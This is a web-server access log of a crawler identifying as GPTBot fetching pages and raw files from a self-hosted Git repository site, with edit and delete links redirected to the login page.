"Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/xref-GoldMonitor_V5.2.html" -[17/Feb/2026:16:41:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer?language=C%23&q=&sort=recentupdate&tab=repositories" [Client 74.7.227.38] [Length 7796] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer" -[17/Feb/2026:16:41:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/index.tsx?display=source" [Client 74.7.227.38] [Length 11670] [Gzip 3.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/index.tsx" -[17/Feb/2026:16:41:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/index.tsx?display=rendered" [Client 74.7.227.38] [Length 10910] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/index.tsx" -[17/Feb/2026:16:41:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/index.tsx?display=source" [Client 74.7.227.38] [Length 11669] [Gzip 3.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/index.tsx" -[17/Feb/2026:16:41:46 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/-" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/xref-GoldMonitor_V5.3.html" -[17/Feb/2026:16:41:47 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/-" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/xref-GoldMonitor_V5.3.html" -[17/Feb/2026:16:41:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/index.tsx?display=rendered" [Client 74.7.227.38] [Length 10911] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/index.tsx" -[17/Feb/2026:16:41:48 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/-" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/xref-GoldMonitor_V5.1.html" -[17/Feb/2026:16:41:48 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/-" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/xref-GoldMonitor_V5.2.html" -[17/Feb/2026:16:41:49 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/-" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/xref-GoldMonitor_V5.1.html" -[17/Feb/2026:16:41:49 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/-" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/xref-GoldMonitor_V5.2.html" -[17/Feb/2026:16:41:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/Program.cs" [Client 74.7.227.38] [Length 14185] [Gzip 4.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal" -[17/Feb/2026:16:41:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/updateRecord.md" [Client 74.7.227.38] [Length 16213] [Gzip 2.75] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker" -[17/Feb/2026:16:41:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/requirements.txt" [Client 74.7.227.38] [Length 11637] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker" -[17/Feb/2026:16:41:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/pip3?display=source" [Client 74.7.227.38] [Length 11575] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/pip3" -[17/Feb/2026:16:41:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/update_status.py?display=rendered" [Client 74.7.227.38] [Length 11053] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/update_status.py" -[17/Feb/2026:16:41:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/docker-compose.yml?display=rendered" [Client 74.7.227.38] [Length 11109] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/docker-compose.yml" -[17/Feb/2026:16:41:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/components/About.tsx?display=rendered" [Client 74.7.227.38] [Length 10950] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/components/About.tsx" -[17/Feb/2026:16:41:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/fallback_http_access.log?display=source" [Client 74.7.227.38] [Length 20598] [Gzip 6.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/fallback_http_access.log" -[17/Feb/2026:16:41:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/fallback_http_error.log?display=source" [Client 74.7.227.38] [Length 14517] [Gzip 4.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/fallback_http_error.log" -[17/Feb/2026:16:41:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/fallback_http_error.log?display=rendered" [Client 74.7.227.38] [Length 10980] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/fallback_http_error.log" -[17/Feb/2026:16:41:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/fallback_stream_access.log?display=source" [Client 74.7.227.38] [Length 10989] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/fallback_stream_access.log" -[17/Feb/2026:16:41:56 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_edit/main/OpcUaMinimal/Program.cs" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/Program.cs" -[17/Feb/2026:16:41:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_edit/main/OpcUaMinimal/Program.cs" -[17/Feb/2026:16:41:57 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_edit/main/asset_pilot_docker/updateRecord.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/updateRecord.md" -[17/Feb/2026:16:41:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_edit/main/asset_pilot_docker/updateRecord.md" -[17/Feb/2026:16:41:57 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_edit/main/asset_pilot_docker/requirements.txt" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/requirements.txt" -[17/Feb/2026:16:41:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_edit/main/asset_pilot_docker/requirements.txt" -[17/Feb/2026:16:41:58 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_delete/main/asset_pilot_docker/updateRecord.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/updateRecord.md" -[17/Feb/2026:16:41:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_delete/main/asset_pilot_docker/updateRecord.md" -[17/Feb/2026:16:41:58 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_delete/main/asset_pilot_docker/requirements.txt" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/requirements.txt" -[17/Feb/2026:16:41:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_delete/main/asset_pilot_docker/requirements.txt" -[17/Feb/2026:16:41:59 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_delete/main/OpcUaMinimal/Program.cs" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/Program.cs" -[17/Feb/2026:16:41:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_delete/main/OpcUaMinimal/Program.cs" -[17/Feb/2026:16:41:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/branch/main/OpcUaMinimal/Program.cs" [Client 74.7.227.38] [Length 9810] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/Program.cs" -[17/Feb/2026:16:42:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/branch/main/asset_pilot_docker/requirements.txt" [Client 74.7.227.38] [Length 10049] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/requirements.txt" -[17/Feb/2026:16:42:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/blame/branch/main/OpcUaMinimal/Program.cs" [Client 74.7.227.38] [Length 13553] [Gzip 6.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/Program.cs" -[17/Feb/2026:16:42:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/branch/main/asset_pilot_docker/updateRecord.md" [Client 74.7.227.38] [Length 9828] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/updateRecord.md" -[17/Feb/2026:16:42:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/branch/main/OpcUaMinimal/Program.cs" [Client 74.7.227.38] [Length 2209] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/Program.cs" -[17/Feb/2026:16:42:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/rss/branch/main/OpcUaMinimal/Program.cs" [Client 74.7.227.38] [Length 893] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/Program.cs" -[17/Feb/2026:16:42:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/branch/main/asset_pilot_docker/updateRecord.md" [Client 74.7.227.38] [Length 9631] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/updateRecord.md" -[17/Feb/2026:16:42:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/rss/branch/main/asset_pilot_docker/updateRecord.md" [Client 74.7.227.38] [Length 935] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/updateRecord.md" -[17/Feb/2026:16:42:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/branch/main/asset_pilot_docker/updateRecord.md" [Client 74.7.227.38] [Length 19528] [Gzip 8.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/updateRecord.md" -[17/Feb/2026:16:42:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/branch/main/asset_pilot_docker/requirements.txt" [Client 74.7.227.38] [Length 11312] [Gzip 3.61] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/requirements.txt" -[17/Feb/2026:16:42:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/branch/main/asset_pilot_docker/requirements.txt" [Client 74.7.227.38] [Length 262] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/requirements.txt" -[17/Feb/2026:16:42:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/fallback_http_access.log?display=rendered" [Client 74.7.227.38] [Length 10937] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/fallback_http_access.log" -[17/Feb/2026:16:42:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/__pycache__/naver_fetcher.cpython-312.pyc" [Client 74.7.227.38] [Length 10909] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/__pycache__" -[17/Feb/2026:16:42:06 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_diffpatch/main/OpcUaMinimal/Program.cs" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/blame/branch/main/OpcUaMinimal/Program.cs" -[17/Feb/2026:16:42:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_diffpatch/main/OpcUaMinimal/Program.cs" -[17/Feb/2026:16:42:07 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_new/main/OpcUaMinimal/Program.cs" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/blame/branch/main/OpcUaMinimal/Program.cs" -[17/Feb/2026:16:42:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_new/main/OpcUaMinimal/Program.cs" -[17/Feb/2026:16:42:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/__pycache__/naver_fetcher.cpython-312.pyc" [Client 74.7.227.38] [Length 10940] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/__pycache__" -[17/Feb/2026:16:42:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components/Contact.tsx?display=source" [Client 74.7.227.38] [Length 16531] [Gzip 5.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components/Contact.tsx" -[17/Feb/2026:16:42:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components/Hero.tsx?display=rendered" [Client 74.7.227.38] [Length 10951] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components/Hero.tsx" -[17/Feb/2026:16:42:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components/Footer.tsx?display=source" [Client 74.7.227.38] [Length 14263] [Gzip 4.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components/Footer.tsx" -[17/Feb/2026:16:42:09 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_new/main/asset_pilot_docker/updateRecord.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/blame/branch/main/asset_pilot_docker/updateRecord.md" -[17/Feb/2026:16:42:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_new/main/asset_pilot_docker/updateRecord.md" -[17/Feb/2026:16:42:10 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_new/main/asset_pilot_docker/requirements.txt" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/blame/branch/main/asset_pilot_docker/requirements.txt" 